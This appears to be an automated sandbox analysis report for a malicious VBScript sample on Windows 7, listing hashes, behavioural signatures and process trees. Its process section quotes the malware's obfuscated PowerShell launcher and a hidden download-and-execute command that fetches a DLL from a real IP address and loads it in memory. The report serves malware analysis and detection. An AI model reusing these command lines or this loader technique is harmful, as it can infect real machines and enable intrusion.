Analysis

max time kernel: 43s
max time network: 46s
platform: windows7_x64
resource: win7-20220718-en
resource tags: arch:x64, arch:x86, image:win7-20220718-en, locale:en-us, os:windows7-x64, system
submitted: 11/08/2022, 18:00
Static task: static1
Behavioral task: behavioral1
Sample: 6e4b16840770fe3b078206831254d138.vbs
Resource: win7-20220718-en
General

Target: 6e4b16840770fe3b078206831254d138.vbs
Size: 204KB
MD5: 6e4b16840770fe3b078206831254d138
SHA1: 12da33c6224a67811698b2b6c8fb771357a43638
SHA256: 7d725947a2cc12a85a532d67444856f521749057a8263a10880634642c2276eb
SHA512: a318aaabe1c9f226d2abaf1556a6693d364676e123e7572a7c95ee44b3f28e1c59f8d7d8a6c203a6e05e0de0f6f0394d6b7c52e8851d2f171880f179a9cdba37
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Signatures

Blocklisted process makes network request (1 IoCs)
  flow  pid  Process
  3     624  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1576  powershell.exe
  624   powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1576  powershell.exe
  Token: SeDebugPrivilege  624   powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process         procid_target
  PID 1804 wrote to memory of 1576   1804  WScript.exe     27
  PID 1804 wrote to memory of 1576   1804  WScript.exe     27
  PID 1804 wrote to memory of 1576   1804  WScript.exe     27
  PID 1576 wrote to memory of 624    1576  powershell.exe  29
  PID 1576 wrote to memory of 624    1576  powershell.exe  29
  PID 1576 wrote to memory of 624    1576  powershell.exe  29
Processes

C:\Windows\System32\WScript.exe (PID 1804)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1576)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC8AeQB1ADcAeQA2AC⌚⌚⌚AJAAhACIAIwAkAC⌚⌚⌚AJgAvACgAKQA9ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 624)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '/yu7y6%$!"#$%&/()=' ))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 138491953f88fa84ce487a0103bea8dd
  SHA1: 4b03d629d82b102099decb7704ac8d38575b3d7a
  SHA256: 75eb0b1be5bce202000050b78f88d6ea79f302237d64d06c82cbe2e6b57794f3
  SHA512: d01db0d9342ff66eae314e7866a68d318d8e541b7ee9e3dbfa49bd734bc98b134fa9584a2d76ca92c11c52e01c12d5ea19c4fa9bbe3f01ee5a702c5c3d99a85c